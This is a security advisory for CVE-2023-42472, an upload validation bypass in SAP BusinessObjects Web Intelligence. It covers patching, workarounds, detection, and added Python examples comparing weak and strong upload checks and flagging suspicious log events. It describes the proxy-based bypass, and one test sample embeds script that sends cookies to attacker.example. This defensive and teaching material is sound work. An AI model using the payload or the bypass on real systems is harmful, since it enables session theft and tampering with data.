CVE-2023-42472

8.7 HIGH

📋 TL;DR

This vulnerability lets an authenticated user with report-creation privileges bypass file type validation in the Web Intelligence HTML interface of SAP BusinessObjects Business Intelligence Platform. Because the upload check trusts client-supplied metadata, the attacker can intercept their own image upload request in a proxy and swap in a non-image file while keeping an image filename and Content-Type; the planted file can then be used to read and modify sensitive data (confidentiality and integrity impact). Affects SAP BusinessObjects BI Platform version 420 (the 4.2 release line).

💻 Affected Systems

Products:
  • SAP BusinessObjects Business Intelligence Platform
Versions: 420 (BI Platform 4.2)
Operating Systems: All supported platforms
Default Config Vulnerable: ⚠️ Yes
Notes: Requires an authenticated account with report-creation (Report Creator) privileges in the Web Intelligence HTML interface.

📦 What is this software?

SAP BusinessObjects Business Intelligence Platform is SAP's enterprise reporting and analytics suite. Web Intelligence is its ad hoc query and reporting tool; the HTML interface is the browser-based report editor in which users build reports and insert images.

⚠️ Risk & Real-World Impact

🔴 Worst Case

Attackers could exfiltrate sensitive business data, modify financial reports, or plant malicious content in the BI platform that is served to other report viewers.

🟠 Likely Case

Unauthorized access to confidential business reports and data manipulation within the BI platform by a low-privileged but authenticated user.

🟢 If Mitigated

Limited impact where network segmentation, strict access controls, and a minimal set of report-creation accounts keep untrusted users away from the interface.

🌐 Internet-Facing: HIGH
🏢 Internal Only: HIGH

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: UNKNOWN
Unauthenticated Exploit: ✅ No
Complexity: MEDIUM

Requires a valid account with report-creation rights and the ability to edit the attacker's own upload request (an intercepting proxy is enough; no man-in-the-middle position against other users is needed).
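The check this vulnerability defeats, and a check that survives the same request tampering, as an added example that is not SAP's code and not from the original page. All sample uploads are constructed; the PNG header is a minimal signature plus IHDR chunk with CRC zeroed, and the script body stands in for whatever non-image file an attacker would smuggle:

```python
"""
Added example, not SAP's code: the class of check CVE-2023-42472 bypasses
(trusting the client-supplied filename and Content-Type) beside a check that
inspects the bytes that were actually uploaded. All sample uploads below are
constructed for the example.
"""
import struct

# Canonical extension and MIME type per image kind the endpoint should accept.
ALLOWED = {
    "png": (".png", "image/png"),
    "jpeg": (".jpg", "image/jpeg"),
    "gif": (".gif", "image/gif"),
}


def _ext(filename: str) -> str:
    """Lower-cased extension, with .jpeg normalised to .jpg; '' if none."""
    ext = "." + filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ".jpg" if ext == ".jpeg" else ext


def weak_is_image(filename: str, content_type: str) -> bool:
    """The bypassable pattern: both inputs come from the request the attacker
    edits in an intercepting proxy, so they prove nothing about the body."""
    return any(_ext(filename) == e and content_type == t for e, t in ALLOWED.values())


def sniff_image_type(data: bytes):
    """Identify the image format from the file signature; None if unknown."""
    if data.startswith(b"\x89PNG\r\n\x1a\n"):
        # A real PNG's first chunk is a 13-byte IHDR; reject anything else.
        if (len(data) >= 16 and struct.unpack(">I", data[8:12])[0] == 13
                and data[12:16] == b"IHDR"):
            return "png"
        return None
    if data.startswith(b"\xff\xd8\xff"):
        return "jpeg"
    if data[:6] in (b"GIF87a", b"GIF89a"):
        return "gif"
    return None


def strong_is_image(filename: str, content_type: str, data: bytes) -> bool:
    """Accept only when the bytes, the extension and the declared type agree.
    In production also re-encode the image with an imaging library and serve
    uploads from a path that never executes content: a polyglot file can carry
    a valid image header in front of script text and pass a signature check."""
    kind = sniff_image_type(data)
    if kind is None:
        return False
    ext, ctype = ALLOWED[kind]
    return _ext(filename) == ext and content_type == ctype


# Constructed 1x1 RGBA PNG header (signature + IHDR; CRC left as zeros, this
# example does not verify chunk CRCs).
REAL_PNG = (b"\x89PNG\r\n\x1a\n" + struct.pack(">I", 13) + b"IHDR"
            + struct.pack(">IIBBBBB", 1, 1, 8, 6, 0, 0, 0) + b"\x00" * 4)
# Constructed attack body: script text sent with an image filename and
# Content-Type, i.e. what the edited upload request carries.
FAKE_PNG = b"<html><script>document.location='http://attacker.example/?'+document.cookie</script></html>"


def evaluate_uploads():
    """Run both checks over the constructed uploads; returns {label: (weak, strong)}."""
    cases = {
        "genuine_png": ("chart.png", "image/png", REAL_PNG),
        "script_as_png": ("chart.png", "image/png", FAKE_PNG),
        "png_bytes_jpeg_header": ("chart.png", "image/jpeg", REAL_PNG),
        "truncated_png": ("chart.png", "image/png", b"\x89PNG\r\n\x1a\njunk"),
    }
    return {label: (weak_is_image(f, c), strong_is_image(f, c, d))
            for label, (f, c, d) in cases.items()}


if __name__ == "__main__":
    for label, (weak, strong) in evaluate_uploads().items():
        print(f"{label:24} metadata-only: {str(weak):5} byte-level: {strong}")
```

The metadata-only check accepts the script body with a `.png` name and `image/png` header exactly as it accepts the real image, which is the whole bypass; the byte-level check rejects it, and also rejects a genuine PNG whose declared type was edited to `image/jpeg`, so a mismatch between what the client claims and what it sent is itself treated as a failure.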

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Apply SAP Note 3370490

Vendor Advisory: https://me.sap.com/notes/3370490

Restart Required: Yes

Instructions:

1. Download and apply the correction listed in SAP Note 3370490 for your support package.
2. Restart the SAP BusinessObjects BI Platform services.
3. Verify the patch is applied correctly (see How to Verify below).

🔧 Temporary Workarounds

Restrict Network Access

Applies to: all platforms

Limit access to the Web Intelligence HTML interface to trusted networks only, and reduce the number of accounts holding report-creation rights.

Implement WAF Rules

Applies to: all platforms

Configure the web application firewall to reject uploads to the image endpoint whose body does not start with a known image signature or whose Content-Type disagrees with the filename extension. This is a stopgap: a polyglot file that carries a valid image header can still pass, so it does not replace the patch.

🧯 If You Can't Patch

  • Implement strict network segmentation to isolate the BI platform from untrusted networks.
  • Enforce least privilege access controls and monitor all authenticated user activity.

🔍 How to Verify

Check if Vulnerable:

The system is vulnerable if SAP BusinessObjects BI Platform version 420 (4.2) is installed and the correction from SAP Note 3370490 has not been applied.

Check Version:

Check the installed version and patch level in the Central Management Console (CMC) or other SAP administration tools, and compare it with the support package or patch named in SAP Note 3370490.

Verify Fix Applied:

Confirm that the support package or patch named in SAP Note 3370490 is installed, then repeat the bypass test from a test account: upload a non-image body with an image filename and Content-Type and confirm the server rejects it.

📡 Detection & Monitoring

Log Indicators:

  • Unusual file upload patterns to the Web Intelligence image upload endpoint
  • Upload requests whose Content-Type header disagrees with the filename extension
  • Repeated failed file validation attempts from one account

Network Indicators:

  • Upload bodies whose leading bytes are not an image signature despite an image Content-Type
  • Non-image file extensions in upload traffic

SIEM Query:

Search upload events in web server or reverse proxy logs for content-type mismatches, unusual file extensions, and bursts of 4xx responses from a single user on the upload endpoint.
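The three indicators above as detection logic run over a constructed log, as an added example that is not part of the original page. The event schema, the user names and the upload path `/bi/upload-image` are placeholders; map them to whatever your web server or reverse proxy actually records (an Apache LogFormat that includes `%{Content-Type}i`, for instance):

```python
"""
Added example, not from SAP or the original page: detection logic for the log
indicators above, run over constructed JSON-lines upload audit events. The
field names and the upload path are placeholders; map them to whatever your
web server or reverse proxy actually records.
"""
import json
from collections import defaultdict

UPLOAD_PATH = "/bi/upload-image"          # placeholder endpoint, not a real SAP path
EXPECTED_TYPE = {"png": "image/png", "jpg": "image/jpeg",
                 "jpeg": "image/jpeg", "gif": "image/gif"}
FAIL_THRESHOLD = 3                        # rejected uploads per user before alerting

# Constructed sample log: one legitimate upload, an extension smuggle, a
# Content-Type smuggle, a burst of rejected uploads, and an unrelated endpoint.
SAMPLE_LOG = """\
{"ts":"2023-09-12T10:01:02Z","user":"alice","method":"POST","path":"/bi/upload-image","status":200,"content_type":"image/png","filename":"q3-chart.png"}
{"ts":"2023-09-12T10:05:44Z","user":"mallory","method":"POST","path":"/bi/upload-image","status":200,"content_type":"image/png","filename":"logo.jsp"}
{"ts":"2023-09-12T10:05:51Z","user":"mallory","method":"POST","path":"/bi/upload-image","status":200,"content_type":"text/html; charset=utf-8","filename":"logo.png"}
{"ts":"2023-09-12T10:06:03Z","user":"mallory","method":"POST","path":"/bi/upload-image","status":400,"content_type":"image/png","filename":"a.png"}
{"ts":"2023-09-12T10:06:09Z","user":"mallory","method":"POST","path":"/bi/upload-image","status":400,"content_type":"image/png","filename":"b.png"}
{"ts":"2023-09-12T10:06:15Z","user":"mallory","method":"POST","path":"/bi/upload-image","status":400,"content_type":"image/png","filename":"c.png"}
{"ts":"2023-09-12T10:07:00Z","user":"bob","method":"POST","path":"/bi/upload-document","status":200,"content_type":"application/pdf","filename":"report.pdf"}
"""


def parse_events(log_text: str):
    """Yield (line_no, event) for each non-empty JSON line."""
    for n, raw in enumerate(log_text.splitlines(), 1):
        if raw.strip():
            yield n, json.loads(raw)


def extension_of(filename: str) -> str:
    """Lower-cased extension without the dot; '' if none."""
    return filename.rsplit(".", 1)[-1].lower() if "." in filename else ""


def detect(log_text: str):
    """Return [(rule, user, line_no)] for upload events matching the indicators:
    a non-image extension, a Content-Type that disagrees with the extension, or
    FAIL_THRESHOLD rejected uploads from one user."""
    alerts = []
    rejections = defaultdict(int)
    for n, ev in parse_events(log_text):
        if ev.get("method") != "POST" or ev.get("path") != UPLOAD_PATH:
            continue                      # only the image upload endpoint matters
        user = ev.get("user", "?")
        ext = extension_of(ev.get("filename", ""))
        # Drop parameters such as "; charset=utf-8" before comparing the media type.
        ctype = ev.get("content_type", "").split(";", 1)[0].strip().lower()
        if ext not in EXPECTED_TYPE:
            alerts.append(("disallowed_extension", user, n))
        elif ctype != EXPECTED_TYPE[ext]:
            alerts.append(("content_type_mismatch", user, n))
        if 400 <= int(ev.get("status", 0)) < 500:
            rejections[user] += 1
            if rejections[user] == FAIL_THRESHOLD:
                alerts.append(("repeated_upload_rejections", user, n))
    return alerts


if __name__ == "__main__":
    for rule, user, line_no in detect(SAMPLE_LOG):
        print(f"line {line_no}: {rule} by {user}")
```

The rejection counter is deliberately per user rather than per source address, since the vulnerability requires an authenticated account; correlate on the session or user field your logs carry. Treat the threshold as a tuning knob for your own upload volume.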

🔗 References

  • SAP Note 3370490: https://me.sap.com/notes/3370490
  • NVD entry: https://nvd.nist.gov/vuln/detail/CVE-2023-42472